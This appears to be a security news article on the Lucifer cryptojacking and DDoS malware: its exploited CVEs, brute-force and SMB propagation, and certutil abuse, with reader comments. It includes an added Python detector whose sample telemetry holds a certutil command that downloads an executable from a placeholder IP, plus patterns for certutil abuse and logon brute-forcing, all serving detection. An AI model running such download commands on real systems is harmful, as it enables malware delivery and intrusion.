Self-Propagating Lucifer Malware Targets Windows Systems


A new devilish malware is targeting Windows systems with cryptojacking and DDoS capabilities.

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

The never-before-seen malware initially tries to infect PCs by bombarding them with exploits, hoping to take advantage of an "exhaustive" list of unpatched vulnerabilities. Patches for all of the critical and high-severity bugs exist, but the companies hit by the malware had not applied them.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” said researchers with Palo Alto Networks’ Unit 42 team, on Wednesday in a blog post. “Applying the updates and patches to the affected software are strongly advised.”

The vulnerabilities targeted by Lucifer include Rejetto HTTP File Server (CVE-2014-6287), Oracle WebLogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), Apache Struts (CVE-2017-9791), the Laravel framework (CVE-2019-9081), and Microsoft Windows (CVE-2017-0144 and CVE-2017-0145, the SMBv1 flaws behind the EternalBlue and EternalRomance exploits, and CVE-2017-8464, the LNK remote code execution bug).

After successfully exploiting these flaws, the attacker connects to the command-and-control (C2) server and executes arbitrary commands on the compromised device, said researchers. These commands include launching a TCP, UDP or HTTP DoS attack. Other commands direct the malware to drop an XMRig miner and begin cryptojacking, collect network interface information, and report the miner's status back to the C2. Researchers say that as of Wednesday, the XMR wallet has been paid 0.493527 XMR (approximately $32).

The malware is also capable of self-propagation through various methods.

It scans for hosts with TCP port 1433 (Microsoft SQL Server) or Remote Procedure Call (RPC) port 135 open. If either is reachable, the malware attempts to brute-force the login using a default administrator username and an embedded password list (the full list of passwords can be found in Unit 42's analysis). On successful authentication, it copies the malware binary to the remote host and runs it.

In addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file-sharing protocol) is exposed, Lucifer throws the leaked Equation Group tooling at it: the EternalBlue and EternalRomance SMBv1 exploits, with the DoublePulsar backdoor as the kernel-mode implant they install.

Once SMB exploitation succeeds, the certutil utility is used to pull the malware onto the newly compromised host. Certutil.exe is a signed Microsoft command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates. Because it can also fetch a file from a URL and encode or decode files, it is a common "living off the land" downloader, and its appearance with download switches on a host that has no CA role is worth alerting on.
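The propagation chain just described leaves two detection opportunities on the victim side: a burst of failed logons from one client against the default administrator account on MSSQL, and certutil.exe being launched with download or decode switches. The following is an added example, not code from the article or from Unit 42, that runs both checks over constructed telemetry. The log formats (Sysmon Event ID 1 style process records and SQL Server ERRORLOG style logon lines), the IP addresses, the file names, and the `sa` account name are all assumptions made for the example.

```python
"""Detection logic for Lucifer-style lateral movement (added example).

Two behaviours from the propagation chain are checked:
  1. certutil.exe invoked with switches that fetch or decode a payload.
  2. Many failed MSSQL logons from one client against one user in a short
     window, optionally followed by a success (password guessed).
All telemetry below is constructed for this example; field names and log
formats are assumptions, not data from the article or from Unit 42.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon Event ID 1 style process-creation records (assumed schema).
PROCESS_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"},
    {"host": "ws02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -store My"},          # benign: lists the personal cert store
    {"host": "ws03", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe"},
    {"host": "ws04", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c whoami"},
]

# Constructed SQL Server ERRORLOG style logon lines (assumed format).
MSSQL_LOG = """\
2020-06-10 03:12:01.22 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2020-06-10 03:12:01.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2020-06-10 03:12:01.63 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2020-06-10 03:12:01.88 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2020-06-10 03:12:02.07 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2020-06-10 03:12:02.31 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.9]
2020-06-10 09:40:10.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.25]
"""

# certutil switches that fetch from a URL or transform a file on disk.
CERTUTIL_ABUSE = re.compile(r"(?i)\s-(urlcache|urlfetch|decode|encode)\b")
# A remote source on the command line: http(s) URL or UNC path.
REMOTE_SRC = re.compile(r"(?i)(https?://\S+|\\\\\S+)")


def certutil_findings(events):
    """Return one finding per certutil.exe launch that uses a download/decode switch."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("\\certutil.exe"):
            continue
        m = CERTUTIL_ABUSE.search(ev["cmdline"])
        if not m:
            continue
        src = REMOTE_SRC.search(ev["cmdline"])
        hits.append({"host": ev["host"], "switch": m.group(1).lower(),
                     "remote": src.group(1) if src else None})
    return hits


LOGON_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) Logon\s+Login (?P<result>failed|succeeded)"
    r" for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")


def parse_logon_lines(text):
    """Parse ERRORLOG logon lines into dicts with a datetime timestamp."""
    recs = []
    for line in text.splitlines():
        m = LOGON_LINE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S.%f")
            recs.append(d)
    return recs


def bruteforce_findings(records, threshold=5, window=timedelta(minutes=1)):
    """Sliding window over failures per (client, user); flag >= threshold inside
    `window` and note whether a success followed the last failure in the burst."""
    by_key = defaultdict(list)
    for r in records:
        by_key[(r["client"], r["user"])].append(r)
    findings = []
    for (client, user), recs in by_key.items():
        recs.sort(key=lambda r: r["ts"])
        fails = [r["ts"] for r in recs if r["result"] == "failed"]
        start = 0
        for end in range(len(fails)):
            while fails[end] - fails[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                last_fail = fails[end]
                success = any(r["result"] == "succeeded" and r["ts"] >= last_fail for r in recs)
                findings.append({"client": client, "user": user,
                                 "failures": end - start + 1, "success_after": success})
                break  # one finding per (client, user) is enough for triage
    return findings


if __name__ == "__main__":
    for f in certutil_findings(PROCESS_EVENTS):
        print("certutil download/decode:", f)
    for f in bruteforce_findings(parse_logon_lines(MSSQL_LOG)):
        print("logon brute force:", f)
```

The brute-force check keys on (client, user) rather than on the client alone because the malware hammers a single default administrator account; a `success_after` of true is the case to escalate, since it means the embedded password list contained a working credential and the binary has likely already been copied over.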

Lucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.

These added capabilities show that the malware is growing in sophistication, researchers warn. Even so, they say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.

“While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it’s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,” stressed researchers.

This article was updated on June 25 to reflect the accurate conversion of XMR to USD.


  • Delph on

    "It scans for either open TCP ports (also known as port 1433)": the first part of your statement has nothing wrong, but your second part of the statement is not correct. There is a chunk of ports associated with TCP, not just 1433.
    • Lindsey O'Donnell on

      You are correct - thank you for pointing it out!
  • Trisha C on

    Going through tweaking my computer the night before last, I've already gotten rid of three of use for by problems lol. I got rid of my default admin, I got rid of anything that deals with remote access and closed my ports.... Getting hacked sucks... Especially when it's a personal attack. I had to learn how to defend myself and now I hope to help others. Thank you so much for sharing the story.
  • SixOfFive on

    "0.493527 XMR approximately $32,579" .. the price per Monero (XMR) is very wrong ... it's currently $64.68 for 1.
    • Lindsey O'Donnell on

      Thanks for pointing it out. The research and article have both been updated to reflect this.
